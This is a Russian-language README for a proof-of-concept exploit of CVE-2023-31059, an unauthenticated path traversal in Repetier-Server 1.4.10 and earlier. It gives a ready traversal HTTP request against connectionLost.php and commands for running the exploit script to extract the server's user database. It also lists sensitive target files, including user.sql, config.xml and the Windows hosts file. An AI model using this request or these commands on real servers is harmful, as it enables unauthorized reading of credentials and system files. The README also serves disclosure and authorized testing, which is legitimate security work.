
Эксплойт доказательства концепции для CVE-2023-31059, неаутентифицированный обход каталогов в Repetier-Server ≤1.4.10, позволяющий читать произвольные файлы через специально сформированные HTTP-запросы.
Автор: Мохаммед Идрис Баньямер
Роль: Исследователь безопасности
Страна: Иордания 🇯🇴
Эксплойт proof‑of‑concept для неавторизованного удаленного обхода пути / LFI уязвимости в Repetier‑Server ≤ 1.4.10.
Уязвимость позволяет читать произвольные файлы через специально созданные последовательности ..%5c в конечной точке connectionLost.php.
| Поле | Значение |
|---|
| Продукт | Repetier‑Server |
| Затронутые версии | ≤ 1.4.10 |
| CVE | CVE‑2023‑31059 |
| Тип | Обход пути / LFI |
| Аутентификация | Отсутствует |
| Вектор | Сеть |
| Влияние | Чтение произвольных файлов |
| CVSS | 9.8 Критический |
flowchart LR
A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
B --> C[base/connectionLost.php]
C -->|Unsanitized file parameter| D[Windows Filesystem]
D --> E[Sensitive File]
E --> B
B -->|File contents in HTTP response| AGET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test
# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
--file "ProgramData\\Repetier-Server\\database\\user.sql" \
--depth 20
pip install requests
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts
Данный PoC предоставляется только для образовательных целей и авторизованного тестирования безопасности. Используйте только на системах, которые вам принадлежат или на которые вы имеете явное разрешение для тестирования.
GitHub: https://github.com/mbanyamer